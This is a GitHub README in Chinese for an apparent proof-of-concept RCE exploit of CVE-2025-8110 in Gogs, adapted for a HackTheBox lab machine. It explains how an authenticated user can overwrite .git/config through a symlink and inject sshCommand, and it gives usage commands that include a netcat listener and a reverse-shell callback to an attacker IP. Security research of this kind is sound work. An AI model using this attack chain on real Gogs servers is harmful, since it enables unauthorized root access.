ixZODiAK/CVE-2025-8110
GitHub: ixZODiAK/CVE-2025-8110
针对 Gogs 自托管 Git 服务 CVE-2025-8110 远程代码执行漏洞的自动化利用工具,通过符号链接绕过实现 RCE 并获取 root 权限。
Stars: 0 | Forks: 0
# CVE-2025-8110 — Gogs RCE PoC (Silentium / HackTheBox)
这是 [zAbuQasem/gogs-CVE-2025-8110](https://github.com/zAbuQasem/gogs-CVE-2025-8110) 的修改版本,经过适配可针对 HackTheBox 上的 **Silentium** 机器运行。原 PoC 需要进行调整,以处理 Silentium 特定的 Gogs 配置和身份验证流程。
## 漏洞详情
**CVE-2025-8110** 是 **Gogs**(一个自托管的 Git 服务)中的一个远程代码执行漏洞。
Gogs 的文件更新 API endpoint (`PUT /api/v1/repos/.../contents/`) 不会验证目标文件是否为符号链接。经过身份验证的攻击者可以将指向 `.git/config` 的符号链接推送到存储库中,然后使用 API 用恶意的 payload 覆盖它。该 payload 会将自定义的 `sshCommand` 注入到 git config 中,Gogs 在下次对该存储库执行 SSH 操作时会在服务器端执行它,从而导致远程代码执行。
## PoC 的作用
1. 向 Gogs 进行身份验证,并从登录页面抓取 CSRF token。
2. 通过用户设置页面生成 Gogs API token。
3. 通过 API 创建一个启用 SSH 的新存储库。
4. 在本地克隆存储库,植入符号链接(`malicious_link -> .git/config`),并将其推送。
5. 对符号链接调用文件更新 API,写入包含 `sshCommand = ` 的恶意 `.git/config`。
6. Gogs 跟随符号链接并覆盖其自身的 `.git/config`,在下一次 SSH 操作时触发 shell。
## 用法
**安装依赖:**
```
pip install -r requirements.txt
```
**启动监听器:**
```
nc -lvnp
```
**运行漏洞利用程序:**
```
python3 CVE-2025-8110.py -u http:// -lh -lp -un -pw
```
**可选 — 通过 Burp Suite 路由:**
```
python3 CVE-2025-8110.py -u http:// -lh -lp -un -pw -x
```
| 标志 | 描述 |
|---|---|
| `-u` | Gogs 基础 URL |
| `-lh` | 你的攻击者 IP(reverse shell 主机) |
| `-lp` | 你的监听端口 |
| `-un` | 你注册的 Gogs 用户名 |
| `-pw` | 你的 Gogs 密码 |
| `-x` | (可选) 将流量通过 `localhost:8080` 上的 Burp 路由 |
标签:CISA项目, Python, 内存分配, 安全, 无后门, 编程工具, 网络安全研究, 超时处理, 远程代码执行, 逆向工具